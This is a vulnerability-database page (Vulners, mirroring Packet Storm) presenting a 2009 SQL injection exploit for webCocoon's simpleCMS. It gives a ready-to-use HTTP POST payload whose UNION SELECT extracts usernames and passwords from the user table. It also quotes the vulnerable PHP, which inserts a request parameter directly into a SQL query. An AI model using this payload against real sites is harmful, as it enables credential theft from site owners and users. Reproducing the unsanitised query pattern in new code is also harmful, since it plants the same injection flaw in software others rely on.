Lucene search
K

webCocoon's simpleCMS SQL Injection

🗓️ 21 Dec 2009 00:00:00Reported by YNFAZCIType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 17 Views

webCocoon's simpleCMS SQL Injection exploi

Code
`#############################################################  
# webCocoon's simpleCMS Vulnerability  
  
# Plugin Home: http://webcocoon.wordpress.com  
  
# Author:_ÝNFAZCI_  
  
# Site: www.1923turk.biz  
  
##############################################################  
  
# Exploit:  
  
  
Vuln file: /content/post/show.php  
  
  
Exploit:  
  
  
POST http://[host]/[path]/index.php HTTP/1.0  
Content-type: application/x-www-form-urlencoded  
  
id=xek' union select null,concat_ws(0x3a,username,password),null,null,n ull,null,null,null,null,null,null,null,null,null,n ull,null from user -- &mode=post&gfile=show  
  
  
  
  
//Show post  
$get_post = mysql_query("SELECT*FROM post WHERE post_id = '$id' AND status = 'published'");  
$post_result = mysql_num_rows($get_post);  
$post = mysql_fetch_array($get_post);   
  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

21 Dec 2009 00:00Current
0.4Low risk
Vulners AI Score0.4
17